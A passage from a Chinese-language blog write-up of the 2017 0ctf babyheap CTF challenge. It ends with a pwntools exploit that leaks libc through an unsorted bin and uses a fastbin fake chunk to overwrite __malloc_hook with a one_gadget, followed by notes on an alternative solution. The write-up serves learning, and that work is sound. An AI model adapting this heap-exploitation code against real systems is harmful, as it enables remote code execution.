class="number">0x21</span>)</span><br><span class="line">fill(<span class="number">3</span>, <span class="built_in">len</span>(extend_3), extend_3)</span><br><span class="line"></span><br><span class="line">alloc(<span class="number">0x10</span>)</span><br><span class="line">alloc(<span class="number">0x10</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">#修改回fastbins大小，用于释放到unsorted_bin</span></span><br><span class="line">extend_3 = flat(cyclic(<span class="number">0x10</span>), <span class="number">0</span>, <span class="number">0x91</span>)</span><br><span class="line">fill(<span class="number">3</span>, <span class="built_in">len</span>(extend_3), extend_3)</span><br><span class="line"><span class="comment">#分配一个chunk防止unsorted_chunk与top_chunk合并</span></span><br><span class="line">alloc(<span class="number">0x60</span>)</span><br><span class="line">free(<span class="number">4</span>)</span><br><span class="line">dump(<span class="number">2</span>)</span><br><span class="line">io.recvuntil(<span class="string">&quot;Content: \n&quot;</span>)</span><br><span class="line">unsorted_main_arena = u64(io.recv(<span class="number">8</span>))</span><br><span class="line">log.success(<span class="string">&quot;unsorted_main_arena_addr: &quot;</span> + <span class="built_in">hex</span>(unsorted_main_arena))</span><br><span class="line"></span><br><span class="line">main_arena = <span class="number">0x3c4b20</span></span><br><span class="line">libc_base = unsorted_main_arena - (main_arena + <span class="number">88</span>)</span><br><span class="line">log.success(<span class="string">&quot;libc base addr: &quot;</span> + <span class="built_in">hex</span>(libc_base))</span><br><span class="line"></span><br><span class="line">hook_addr = libc_base + libc.sym[<span class="string">&quot;__malloc_hook&quot;</span>]</span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(hook_addr))</span><br><span class="line"><span class="comment">#构造0x60 unsorted_bin链</span></span><br><span class="line">alloc(<span class="number">0x60</span>)</span><br><span class="line">free(<span class="number">4</span>) </span><br><span class="line"></span><br><span class="line"><span class="comment">#伪造chunk，指向hook</span></span><br><span class="line">fake_chunk = flat(hook_addr - <span class="number">0x23</span>)</span><br><span class="line">fill(<span class="number">2</span>, <span class="built_in">len</span>(fake_chunk), fake_chunk)</span><br><span class="line">alloc(<span class="number">0x60</span>)</span><br><span class="line">alloc(<span class="number">0x60</span>) <span class="comment">#获取index6指向hook地址</span></span><br><span class="line"></span><br><span class="line">one_gadget_addr = libc_base + <span class="number">0x4527a</span></span><br><span class="line"><span class="comment">#篡改__malloc_hook</span></span><br><span class="line">payload = flat(cyclic(<span class="number">0x13</span>), one_gadget_addr)</span><br><span class="line">fill(<span class="number">6</span>, <span class="built_in">len</span>(payload), payload)</span><br><span class="line"><span class="comment">#触发calloc</span></span><br><span class="line">alloc(<span class="number">0x100</span>)</span><br><span class="line"></span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>

<h3 id="三、解法二"><a href="#三、解法二" class="headerlink" title="三、解法二"></a>三、解法二</h3><p>按照本文的思路一：分配两个chunk，index1和index2，扩展index1到index2的fd和bk指针，释放index2，index2的fd和bk指针会指向main_arena，读取index1获取index2的内容</p>
<p>如果直接读取index1，由于读取的index1大小在分配时已经固定在索引表中，与实际的chunk size字段不匹配，需要free掉index1，然后重新分配chunk size大小，可更新索引表中的size，这个时候读取index1内容</p>
<img src="https://i.loli.net/2021/04/02/U8LHXI5bpcwAg3O.png" style="zoom:80%;" />

<h4 id="比较解法一和解法二"><a href="#比较解法一和解法二" class="headerlink" title="比较解法一和解法二"></a>比较解法一和解法二</h4><ul>
<li><p>解法一在释放分配目标unsorted chunk的时候为了绕过fastbin和unsorted_bin需要两次更改size字段以绕过安全检查，可以将大小为fastbin更改为unsorted_bin，应该可以减少安全绕过次数</p>
</li>
<li><p>解法一一直有个问题困扰我，为什么只需要更改最低位一个字节就可以将指针指向目标地址，原来：在libc2.23中，用户分配的第一个堆块就位于堆区起始地址，也就是说用户分配的第一个堆块的地址最低字节一定是00（在目前的libc版本中，堆区的起始地址最低字节都是00），这样可以计算偏移，但在libc2.26的系统中，用户分配的第一个堆块并不位于堆区的起始处！而是从堆区起始地址往后偏移了很大一段距离（可能要根据glibc版本计算偏移） 。解法一容易出现glibc版本不兼容</p>
</li>
</ul>
<p><a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/168009">详细内容</a></p>
<h3 id="四、总结："><a href="#四、总结：" class="headerlink" title="四、总结："></a>四、总结：</h3><p>通过此题get到的新知识</p>
<ul>
<li>fastbin_attack</li>
<li>libc基地址泄露</li>
<li>__malloc_hook</li>
<li>size错位构造</li>
</ul>
<h3 id="参考文献"><a href="#参考文献" class="headerlink" title="参考文献"></a>参考文献</h3><ul>
<li><a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/168009">https://www.anquanke.com/post/id/168009</a></li>
<li><a target="_blank" rel="noopener" href="https://ctf-wiki.org/pwn/linux/glibc-heap/fastbin_attack">https://ctf-wiki.org/pwn/linux/glibc-heap/fastbin_attack</a></li>
</ul>

    </div>

    
    
    
        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者： </strong>John Doe
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="http://example.com/2021/04/03/2017%200ctf%20babyheap%20WriteUp/" title="Fastbin Attack之2017 0ctf babyheap">http://example.com/2021/04/03/2017 0ctf babyheap WriteUp/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fa fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>


      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E5%A0%86/" rel="tag"># 堆</a>
              <a href="/tags/fastbin-attack/" rel="tag"># fastbin_attack</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2021/03/31/freefloatftpserver1.0%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/" rel="prev" title="Freefloat FTP Server1.0栈溢出漏洞分析">
      <i class="fa fa-chevron-left"></i> Freefloat FTP Server1.0栈溢出漏洞分析
    </a></div>
      <div class="post-nav-item">
    <a href="/2021/04/12/PCMan%20FTP%20Server%E7%BC%93%E5%86%B2%E5%8C%BA%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/" rel="next" title="">
       <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%B8%80%E3%80%81%E9%80%86%E5%90%91%E5%88%86%E6%9E%90"><span class="nav-text">一、逆向分析</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#main%E5%87%BD%E6%95%B0"><span class="nav-text">main函数</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#allocate%E5%87%BD%E6%95%B0"><span class="nav-text">allocate函数</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Fill%E5%87%BD%E6%95%B0"><span class="nav-text">Fill函数</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Free%E5%87%BD%E6%95%B0%E5%92%8CDump%E5%87%BD%E6%95%B0"><span class="nav-text">Free函数和Dump函数</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%BA%8C%E3%80%81%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8"><span class="nav-text">二、漏洞利用</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%B3%84%E9%9C%B2libc%E5%9F%BA%E5%9C%B0%E5%9D%80"><span class="nav-text">泄露libc基地址</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#Fastbin-Attack"><span class="nav-text">Fastbin Attack</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#hook%E5%8A%AB%E6%8C%81"><span class="nav-text">hook劫持</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#One-gadget"><span class="nav-text">One_gadget</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%AE%8C%E6%95%B4exploit"><span class="nav-text">完整exploit</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%B8%89%E3%80%81%E8%A7%A3%E6%B3%95%E4%BA%8C"><span class="nav-text">三、解法二</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%AF%94%E8%BE%83%E8%A7%A3%E6%B3%95%E4%B8%80%E5%92%8C%E8%A7%A3%E6%B3%95%E4%BA%8C"><span class="nav-text">比较解法一和解法二</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%9B%9B%E3%80%81%E6%80%BB%E7%BB%93%EF%BC%9A"><span class="nav-text">四、总结：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%8F%82%E8%80%83%E6%96%87%E7%8C%AE"><span class="nav-text">参考文献</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">John Doe</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">4</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">1</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">4</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/hqz66" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;hqz66" rel="noopener" target="_blank"><i class="fa fa-fw fa-github"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="/1219089065@gmail.com" title="E-Mail → 1219089065@gmail.com"><i class="fa fa-fw fa-envelope"></i>E-Mail</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">John Doe</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
    <span title="站点总字数">20k</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">18 分钟</span>
</div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script>
  <script src="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3/dist/jquery.fancybox.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>
